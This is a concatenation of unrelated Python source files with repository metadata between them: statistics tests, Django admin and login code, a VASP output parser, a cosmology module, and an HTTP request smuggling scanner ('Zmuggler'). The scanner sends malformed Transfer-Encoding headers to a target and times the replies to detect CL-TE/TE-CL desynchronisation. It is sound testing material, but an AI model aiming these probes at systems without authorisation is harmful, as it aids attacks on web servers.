[None, None, 'gaussian-copula'],
[None, None, None]]
valuedict = {"solar": 1, "wind": 1, "tide": 0.73}
lowerdict = {"solar": -3, "wind": -2, "tide": 0}
upperdict = {"solar": 0.5, "wind": 1, "tide": 1}
mydistr = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
n = 20 #number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P =[]
fig = plt.figure()
center = 0.5*np.ones(d)
k = 2 #index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj(U[i],k)
ax.scatter(P[0,0],P[0,1],P[0,2], c='r', marker='o')
ax.plot([U[i,0], P[0,0]],[U[i,1], P[0,1]],[U[i,2], P[0,2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0],diagonal[1][0]], [diagonal[0][1],diagonal[1][1]],[diagonal[0][2],diagonal[1][2]], c='b')
ax.set_xlabel(dimkeys[0])
ax.set_ylabel(dimkeys[1])
ax.set_zlabel(dimkeys[2])
plt.show()
class RankHistogramTester(unittest.TestCase):
def test_normal_distribution(self):
mu = 0
sigma = 1
m = 10000
mydistr = UnivariateNormalDistribution(0, 1)
rank_data = mu + sigma * np.random.randn(10000)
rank = RankHistogram(mydistr, rank_data, 25)
rank.plot()
def test_gaussian_copula(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.5
rho2 = 0.5
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
rank_data = multigaussian2.generates_U(10000)
diag(2).rank_histogram(rank_data, 20, multigaussian1)
class EMDTester(unittest.TestCase):
def test_different_comparison(self):
"""
        This test compares the different comparisons we can imagine between an empirical distribution and the uniform distribution.
        The EMD to the uniform distribution is difficult to compute, so we represent the uniform distribution by a vector:
        Either by generating a random sample on [0,1] : Y
        Or with regular intervals of length 1/n on [0,1] : Z
        Or with smaller regular intervals of length 1/m on [0,1] : A
        :return: plots the histograms of the EMDs found for each vector when we compute 1000 of these 3 EMDs
"""
n = 10000
m = 100
H = np.zeros((1000, 3))
Z = np.asarray(range(n)) / n
A = np.zeros(n)
for i in range(m):
            for j in range(n // m):
                A[i * (n // m) + j] = i / m
for k in range(1000):
X = np.random.rand(n)
Y = np.random.rand(n)
H[k][0] = emd_sort(U=X, V=Y)
H[k][1] = emd_sort(U=X, V=Z)
H[k][2]= emd_sort(U=X, V=A)
print(k)
        count, bins, ignored = plt.hist(H, density=True, label=['X vs Y', 'X vs Z', 'X vs A'], color=['b', 'r', 'k'])
# EMD between X and Y will be in blue
# EMD between X and Z will be in red
# EMD between X and A will be in black
plt.legend(loc='upper right')
plt.plot(bins, np.ones_like(bins), linewidth=2, color='b')
plt.show()
def test_pyomo_with_sort(self):
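        # emd_sort uses the 1-D optimal-transport shortcut (sort both samples
        # and pair order statistics), while emd_pyomo solves the full
        # transportation LP; the two estimates should match while differing
        # greatly in runtime.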
n = 100
p=1
normal1 = np.random.randn(n)
normal2 = np.random.randn(n)
uniform1 = np.random.rand(n)
uniform2 = np.random.rand(n)
linearprog = np.asarray(range(n)) / n
U = linearprog
V = normal1
iter = []
for i in range(n):
for j in range(n):
iter.append((i, j))
print('Unsorted')
print('EMD sort')
tic()
print(emd_sort(U, V,p))
toc()
print('EMD pyomo')
tic()
print(emd_pyomo(U, V,p)[0])
toc()
        print(' ')
        print('Sorted')
        print('EMD sort')
        tic()
        print(emd_sort(np.sort(U), np.sort(V), p))
        toc()
        print('EMD pyomo')
tic()
print(emd_pyomo(np.sort(U),np.sort(V),p)[0])
toc()
def test_gaussian_copula(self):
        # not finished yet
        print("Warning: test not finished yet")
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.1
rho2 = 0.9
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
print(emd_sort(data_array,data_array))
print(emd_sort(data_array2, data_array))
print(emd_sort(data_array2, data_array2))
#self.assertGreater(g, m)
#self.assertGreater(m, s)
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
i=+1
print(i)
| 43.644366 | 134 | 0.61584 | 33,758 | 0.907839 | 0 | 0 | 0 | 0 | 0 | 0 | 4,999 | 0.134436 |
5fa27ee2e5dad2743d90292ecca26ad61a23a586 | 615 | py | Python | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | 1 | 2020-07-31T06:34:27.000Z | 2020-07-31T06:34:27.000Z | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | inbound/admin.py | nilesh-kr-dubey/django-inbound-rules | 5ca122bf915d17c04a63b1464048bba91006e854 | [
"MIT"
] | null | null | null | from django.contrib import admin
from inbound.models import Rule, InboundIP
# Register your models here.
class InboundIPInline(admin.TabularInline):
''' Inline of Inbound Rule '''
model = InboundIP
readonly_fields = ['cidr']
extra = 1
class RuleAdmin(admin.ModelAdmin):
model = Rule
list_display = ['name', 'namespace', 'url_name', 'group', 'allow_all', 'is_active', 'created']
exclude = ['alias', 'slug', 'extra']
list_filter = ['is_active', 'group', 'namespace', 'url_name']
raw_id_fields = ['group']
inlines = [InboundIPInline]
admin.site.register(Rule, RuleAdmin)
| 25.625 | 98 | 0.676423 | 464 | 0.754472 | 0 | 0 | 0 | 0 | 0 | 0 | 195 | 0.317073 |
5fa29ec1b9e32e73683aab09293ca2018836774b | 397 | py | Python | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | 2 | 2020-12-11T12:45:34.000Z | 2021-11-09T11:25:23.000Z | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | firldBuzzUserEntryApp/login/loginForm.py | sir-rasel/backend-api-integration | 41e3d44caa6ec10382efbb482cb9d0f77bd4a5fb | [
"MIT"
] | null | null | null | from django import forms
class LoginForm(forms.Form):
    userName = forms.EmailField(label='User Name', max_length=55, required=True, \
        widget=forms.EmailInput(attrs={'placeholder': 'Username that was sent via mail'}))
    password = forms.CharField(label='Password', max_length=55, required=True, \
        widget=forms.PasswordInput(attrs={'placeholder': 'Password that was sent via mail'}))
| 49.625 | 89 | 0.722922 | 370 | 0.93199 | 0 | 0 | 0 | 0 | 0 | 0 | 106 | 0.267003 |
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d | 751 | py | Python | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | 1 | 2021-01-03T13:01:33.000Z | 2021-01-03T13:01:33.000Z | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | src/level2/뉴스클러스터링.py | iml1111/programmers_coding_study | 07e89220c59c3b40dd92edc39d1b573d018efae4 | [
"MIT"
] | null | null | null | from collections import Counter
def refine(s):
result = []
for i in range(len(s) - 1):
bigram = s[i:i+2].lower()
if bigram.isalpha():
result.append(bigram)
return result
def solution(str1, str2):
counter1, counter2 = Counter(refine(str1)), Counter(refine(str2))
set1, set2 = set([i for i in counter1]), set([i for i in counter2])
a_point = sum([min(counter1[idx], counter2[idx]) for idx in set1 & set2])
b_point = sum([max(counter1[idx], counter2[idx]) for idx in set1 | set2])
if a_point == b_point:
return 65536
else:
return int(a_point / b_point * 65536)
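# Worked example: refine("FRANCE") -> ['fr', 'ra', 'an', 'nc', 'ce'] and
# refine("french") -> ['fr', 're', 'en', 'nc', 'ch']; the multiset
# intersection has size 2 and the union size 8, so
# solution("FRANCE", "french") == int(2 / 8 * 65536) == 16384.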
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2")) | 31.291667 | 77 | 0.609854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 64 | 0.08522 |
5fa6b75aa0e33eeec7402b44584c8450dcb054c7 | 1,226 | py | Python | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | gssClients/gssPythonClients/download_gss.py | SemWES/client_libs | 48c3af519ceaf80b3f33cf509c72376b9b3d9582 | [
"Zlib"
] | null | null | null | #!/bin/env python
# Copyright STIFTELSEN SINTEF 2016
import suds
import urllib2
import sys
if len(sys.argv) < 4:
print ("Usage:")
print ("\t %s gss-url outputfilename token" % sys.argv[0])
exit()
# get url:
url = sys.argv[1]
outputfileName = sys.argv[2]
sessionToken = sys.argv[3]
wsdlLocation = "https://api.caxman.eu/sintef/infrastructure/gss-0.1/FileUtilities?wsdl"
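# Flow: ask the SOAP FileUtilities service how the resource can be read, copy
# the advertised session-token header (plus any extra headers) onto a plain
# HTTP GET, then stream the payload to disk.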
client = suds.client.Client(wsdlLocation)
resourceInformation = client.service.getResourceInformation(url, sessionToken)
readDescription = resourceInformation.readDescription
if readDescription.supported:
headers = {}
headers[readDescription.sessionTokenField] = sessionToken
if hasattr(readDescription, "headers"):
for headerField in readDescription.headers:
headers[headerField.key] = headerField.value
with open(outputfileName, "wb") as outputFile:
request = urllib2.Request(url = readDescription.url, headers=headers)
result = urllib2.urlopen(request)
while True:
buffer = result.read()
if not buffer:
break
outputFile.write(buffer)
else:
print "The given gss_url does not support read/download."
| 29.190476 | 88 | 0.686786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 242 | 0.19739 |
5faad04658ea51684534a077173c5f03481fc86f | 6,728 | py | Python | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | 1 | 2021-07-28T06:02:44.000Z | 2021-07-28T06:02:44.000Z | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | Zmuggler.py | electronicbots/Zmuggler | 5b9df5919367dffb588b18c5acd567e20135d2b7 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
# Disable http.client's header validation so deliberately malformed
# Transfer-Encoding headers can be sent (these are the private hooks that
# http.client.putheader consults in CPython).
http.client._is_legal_header_name = lambda x: True
http.client._is_illegal_header_value = lambda x: False
urllib3.disable_warnings()
class ZSmuggler():
def __init__(self, url):
self.url = url
self.pheaders = []
self.rheaders = []
def genHeaders(self):
transfer_encoding = list(
[
["Transfer-Encoding", "chunked"],
["Transfer-Encoding ", "chunked"],
["Transfer_Encoding", "chunked"],
["Transfer Encoding", "chunked"],
[" Transfer-Encoding", "chunked"],
["Transfer-Encoding", " chunked"],
["Transfer-Encoding", "chunked"],
["Transfer-Encoding", "\tchunked"],
["Transfer-Encoding", "\u000Bchunked"],
["Content-Encoding", " chunked"],
["Transfer-Encoding", "\n chunked"],
["Transfer-Encoding\n ", " chunked"],
["Transfer-Encoding", " \"chunked\""],
["Transfer-Encoding", " 'chunked'"],
["Transfer-Encoding", " \n\u000Bchunked"],
["Transfer-Encoding", " \n\tchunked"],
["Transfer-Encoding", " chunked, cow"],
["Transfer-Encoding", " cow, "],
["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
["Transfer-Encoding", " chunk"],
["Transfer-Encoding", " cHuNkeD"],
["TrAnSFer-EnCODinG", " cHuNkeD"],
["Transfer-Encoding", " CHUNKED"],
["TRANSFER-ENCODING", " CHUNKED"],
["Transfer-Encoding", " chunked\r"],
["Transfer-Encoding", " chunked\t"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer\r-Encoding", " chunked"],
["barn\n\nTransfer-Encoding", " chunked"],
])
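        # Each variant mangles the Transfer-Encoding header (case, whitespace,
        # duplicates, line folding) to probe whether the front-end and
        # back-end servers disagree on chunked framing.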
for x in transfer_encoding:
headers = collections.OrderedDict()
headers[x[0]] = x[1]
headers['Cache-Control'] = "no-cache"
headers['Content-Type'] = "application/x-www-form-urlencoded"
headers['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
self.pheaders.append(headers)
def resptime(self, headers={}, payload=""):
s = Session()
req = Request('POST', self.url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except Exception as e:
if isinstance(e, ReadTimeout):
resp_time = 10
return resp_time
def calcT(self, L_Bigtime, P_Bigtime, L_Smalltime, P_Smalltime):
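        # Timing probe: the "big" request declares a Content-Length that
        # disagrees with its chunked body, so a desynchronised front/back-end
        # pair stalls waiting for more data (>= 5 s) while the well-formed
        # "small" request returns quickly; a large big/small time ratio is
        # taken as evidence of request smuggling.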
for headers in self.pheaders:
headers['Content-Length'] = L_Bigtime
big_time = self.resptime(headers, P_Bigtime)
if not big_time:
big_time = 0
if big_time < 5:
continue
headers['Content-Length'] = L_Smalltime
small_time = self.resptime(headers, P_Smalltime)
if not small_time:
small_time = 1
if big_time > 5 and big_time / small_time >= 5:
self.valid = True
self.type = "CL-TE"
self.rheaders = [headers]
return True
return False
def Bcheck(self):
header = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
try:
resp = requests.get(self.url, headers=header, verify=False, timeout=10)
if resp.status_code == 200:
return True
else:
return False
except Exception as error:
print(error)
def checkCLTE(self):
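        # Classic CL-TE timing payload: the same chunked body with a short (4)
        # vs. long (11) Content-Length; see calcT for the interpretation.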
result = self.calcT(4, "1\r\nA\r\nS\r\n\r\n\r\n", 11, "1\r\nA\r\nS\r\n\r\n\r\n")
return result
def checkTECL(self):
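        # TE-CL timing payload: a terminated chunked body ("0\r\n\r\n") plus
        # one stray byte that only a Content-Length parser would wait for.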
result = self.calcT(6, "0\r\n\r\nX", 5, "0\r\n\r\n")
return result
def expl0it(self):
if self.Bcheck():
self.genHeaders()
try:
result = self.checkCLTE()
flag = "CLTE"
if not result:
result = self.checkTECL()
flag = "TECL"
if result:
print("\033[1;31m" + "\033[1;m\033[1;32m[+] Found possible " + flag)
self.recheck(flag)
except Exception as e:
print(e)
print("timeout: " + self.url)
else:
print('\033[1;31m' + "[-] can't access target" + '\033[1;m')
def recheck(self, flag):
print("[+] Checking again...")
result = False
if flag == "CLTE":
result = self.checkCLTE()
if flag == "TECL":
result = self.checkTECL()
if result:
payloadkey = list(self.rheaders[0])[0]
payloadV = self.rheaders[0][payloadkey]
payload = str([payloadkey, payloadV])
print(flag, payload)
def Main():
arguments = Args()
if '--target' in str(sys.argv):
        target = arguments.link  # Args() stores the URL under dest='link'
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
def Args():
Parser = optparse.OptionParser()
group = optparse.OptionGroup(Parser, "Grouped arguments")
group.add_option('--target' , dest='link', help = 'target URL')
Parser.add_option_group(group)
(arguments, values) = Parser.parse_args()
return arguments
if __name__ == '__main__':
    Main()
| 35.597884 | 148 | 0.5 | 5,492 | 0.81629 | 0 | 0 | 0 | 0 | 0 | 0 | 2,137 | 0.317628 |
5faed7df0481d882b8814038712e8be58ef77e17 | 3,397 | py | Python | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
def setup(options):
if options.has_value(option_section, "theta"):
theta = options[option_section, 'theta']
if np.isscalar(theta):
theta = np.array([theta])
theta = arcmin_to_radians(theta)
else:
n_theta = options[option_section, "n_theta"]
theta_min = options[option_section, "theta_min"]
theta_max = options[option_section, "theta_max"]
theta_min = arcmin_to_radians(theta_min)
theta_max = arcmin_to_radians(theta_max)
theta = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta)
corr_type = options.get_int(option_section, 'corr_type')
ell_max = options.get_int(option_section, "ell_max")
cl_section = options.get_string(option_section, "input_section_name", "")
output_section = options.get_string(
option_section, "output_section_name", "")
# setup precompute functions and I/O sections
if corr_type == 0:
precomp_func = precomp_GpGm
cl_to_xi_func = save_xi_22
if not cl_section:
cl_section = "shear_cl"
if not output_section:
output_section = "shear_xi"
elif corr_type == 1:
precomp_func = get_legfactors_00
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_cl"
if not output_section:
output_section = "galaxy_xi"
elif corr_type == 2:
precomp_func = get_legfactors_02
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_shear_cl"
if not output_section:
output_section = "galaxy_shear_xi"
    else:
        raise ValueError(
            "corr_type should be 0 (for spin 2 autocorrelations e.g. xi+/-(theta)), "
            "1 (for scalar autocorrelations e.g. w(theta)) or 2 "
            "(for spin 0 x spin 2 correlations e.g. gamma_t(theta))")
legfacs = precomp_func(np.arange(ell_max + 1), theta)
return theta, ell_max, legfacs, cl_to_xi_func, cl_section, output_section
def execute(block, config):
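    """Transform each bin pair's C_ell into xi(theta) and store it in the block."""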
thetas, ell_max, legfacs, cl_to_xi_func, cl_section, output_section = config
n_theta = len(thetas)
ell = block[cl_section, "ell"]
nbina, nbinb = block[cl_section, 'nbin_a'], block[cl_section, 'nbin_b']
block[output_section, "nbin_a"] = nbina
block[output_section, "nbin_b"] = nbinb
block[output_section, "theta"] = thetas
#block.put_metadata(output_section, "theta", "unit", "radians")
for i in range(1, nbina + 1):
for j in range(1, nbinb + 1):
name = 'bin_%d_%d' % (i, j)
if block.has_value(cl_section, name):
c_ell = block[cl_section, name]
else:
continue
cl_interp = SpectrumInterp(ell, c_ell)
cl_to_xi_func(block, output_section, i, j,
cl_interp, thetas, legfacs)
return 0
def cleanup(config):
# nothing to do here! We just include this
# for completeness. The joy of python.
return 0
| 36.138298 | 87 | 0.657345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 643 | 0.189285 |
5fafc8dcb4215c91fc9ae3f825e9c6da430bff4a | 326 | py | Python | software/glasgow/applet/video/__init__.py | electroniceel/Glasgow | f6d8fda1d5baec006a6c43fa3d2547a33bdee666 | [
"Apache-2.0",
"0BSD"
] | 1,014 | 2019-10-05T16:21:43.000Z | 2022-03-31T09:26:43.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 113 | 2019-10-06T07:49:37.000Z | 2022-03-24T04:33:08.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 79 | 2019-10-08T07:36:03.000Z | 2022-03-21T07:00:27.000Z | """
The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic
transfers of 2d arrays of samples of electromagnetic wave properties.
Examples: VGA output, TFT LCD capture, TFT LCD output.
Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``).
"""
| 40.75 | 98 | 0.757669 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 325 | 0.996933 |
5fb11bba5257814c53fdaf00b36feffb7caef7ad | 22,329 | py | Python | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """
The vasprun.xml parser interface.
---------------------------------
Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
class VasprunParser(BaseFileParser):
"""The parser interface that enables parsing of ``vasprun.xml`` content.
The parser is triggered by using the keys listed in ``PARSABLE_QUANTITIES``.
"""
OPEN_MODE = 'rb'
DEFAULT_SETTINGS = {
'quantities_to_parse': [
'structure',
'eigenvalues',
'dos',
'kpoints',
'occupancies',
'trajectory',
'energies',
'projectors',
'dielectrics',
'born_charges',
'hessian',
'dynmat',
'forces',
'stress',
'total_energies',
'maximum_force',
'maximum_stress',
'band_properties',
'version',
],
'energy_type': ['energy_extrapolated'],
'electronic_step_energies': False
}
PARSABLE_QUANTITIES = {
'structure': {
'inputs': [],
'name': 'structure',
'prerequisites': [],
'alternatives': ['poscar-structure']
},
'eigenvalues': {
'inputs': [],
'name': 'eigenvalues',
'prerequisites': [],
'alternatives': ['eigenval-eigenvalues']
},
'dos': {
'inputs': [],
'name': 'dos',
'prerequisites': [],
'alternatives': ['doscar-dos']
},
'kpoints': {
'inputs': [],
'name': 'kpoints',
'prerequisites': [],
'alternatives': ['kpoints-kpoints']
},
'occupancies': {
'inputs': [],
'name': 'occupancies',
'prerequisites': [],
},
'trajectory': {
'inputs': [],
'name': 'trajectory',
'prerequisites': [],
},
'energies': {
'inputs': [],
'name': 'energies',
'prerequisites': [],
},
'total_energies': {
'inputs': [],
'name': 'total_energies',
'prerequisites': [],
},
'projectors': {
'inputs': [],
'name': 'projectors',
'prerequisites': [],
},
'dielectrics': {
'inputs': [],
'name': 'dielectrics',
'prerequisites': [],
},
'stress': {
'inputs': [],
'name': 'stress',
'prerequisites': [],
},
'forces': {
'inputs': [],
'name': 'forces',
'prerequisites': [],
},
'born_charges': {
'inputs': [],
'name': 'born_charges',
'prerequisites': [],
},
'hessian': {
'inputs': [],
'name': 'hessian',
'prerequisites': [],
},
'dynmat': {
'inputs': [],
'name': 'dynmat',
'prerequisites': [],
},
'fermi_level': {
'inputs': [],
'name': 'fermi_level',
'prerequisites': [],
},
'maximum_force': {
'inputs': [],
'name': 'maximum_force',
'prerequisites': []
},
'maximum_stress': {
'inputs': [],
'name': 'maximum_stress',
'prerequisites': []
},
'band_properties': {
'inputs': [],
'name': 'band_properties',
'prerequisites': [],
},
'version': {
'inputs': [],
'name': 'version',
'prerequisites': [],
}
}
    # Mapping of the energy names to those returned by parsevasp.vasprun.Xml
ENERGY_MAPPING = {
'energy_extrapolated': 'energy_extrapolated_final',
'energy_free': 'energy_free_final',
'energy_no_entropy': 'energy_no_entropy_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
ENERGY_MAPPING_VASP5 = {
'energy_extrapolated': 'energy_no_entropy_final',
'energy_free': 'energy_free_final',
        # Note that the parsed energy_extrapolated_final is the entropy term
'energy_no_entropy': 'energy_extrapolated_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
def _init_from_handler(self, handler):
"""Initialize using a file like handler."""
try:
self._content_parser = Xml(file_handler=handler, k_before_band=True, logger=self._logger)
except SystemExit:
self._logger.warning('Parsevasp exited abnormally.')
@property
def version(self):
"""Fetch the VASP version from ``parsevasp`` and return it as a string object."""
# fetch version
version = self._content_parser.get_version()
if version is None:
return None
return version
@property
def eigenvalues(self):
"""Fetch eigenvalues."""
# Fetch eigenvalues
eigenvalues = self._content_parser.get_eigenvalues()
if eigenvalues is None:
return None
return eigenvalues
@property
def occupancies(self):
"""Fetch occupancies."""
# Fetch occupancies
occupancies = self._content_parser.get_occupancies()
if occupancies is None:
# occupancies not present, should not really happen?
return None
return occupancies
@property
def kpoints(self):
"""Fetch the kpoints an prepare for consumption by the NodeComposer."""
kpts = self._content_parser.get_kpoints()
kptsw = self._content_parser.get_kpointsw()
        # k-points in the XML are always in reciprocal coordinates if spacing methods have been used
# but what about explicit/regular
cartesian = False
kpoints_data = None
if (kpts is not None) and (kptsw is not None):
# Create a dictionary and store k-points that can be consumed by the NodeComposer
kpoints_data = {}
kpoints_data['mode'] = 'explicit'
kpoints_data['cartesian'] = cartesian
kpoints_data['points'] = kpts
kpoints_data['weights'] = kptsw
return kpoints_data
@property
def structure(self):
"""
Fetch a given structure.
Which structure to fetch is controlled by inputs.
        eFL: Need to clean this up so that we can select different
        structures to pull from the outside. Could be useful to avoid
        pulling the whole trajectory.
Currently defaults to the last structure.
"""
return self.last_structure
@property
def last_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step.
"""
last_lattice = self._content_parser.get_lattice('last')
if last_lattice is None:
return None
return _build_structure(last_lattice)
@property
def final_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step. Should in
principle be the same as the method above.
"""
return self.last_structure
@property
def last_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
force = self._content_parser.get_forces('last')
return force
@property
def final_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
return self.last_forces
@property
def forces(self):
"""
Fetch forces.
This container should contain all relevant forces.
        Currently, it only contains the final forces, which can be obtained
by the id `final_forces`.
"""
final_forces = self.final_forces
forces = {'final': final_forces}
return forces
@property
def maximum_force(self):
"""Fetch the maximum force of at the last ionic run."""
forces = self.final_forces
if forces is None:
return None
norm = np.linalg.norm(forces, axis=1)
return np.amax(np.abs(norm))
@property
def last_stress(self):
"""
        Fetch stress.
After or at the last recorded ionic step.
"""
stress = self._content_parser.get_stress('last')
return stress
@property
def final_stress(self):
"""
Fetch stress.
After or at the last recorded ionic step.
"""
return self.last_stress
@property
def stress(self):
"""
Fetch stress.
This container should contain all relevant stress.
        Currently, it only contains the final stress, which can be obtained
by the id `final_stress`.
"""
final_stress = self.final_stress
stress = {'final': final_stress}
return stress
@property
def maximum_stress(self):
"""Fetch the maximum stress of at the last ionic run."""
stress = self.final_stress
if stress is None:
return None
norm = np.linalg.norm(stress, axis=1)
return np.amax(np.abs(norm))
@property
def trajectory(self):
"""
Fetch unitcells, positions, species, forces and stress.
For all calculation steps.
"""
unitcell = self._content_parser.get_unitcell('all')
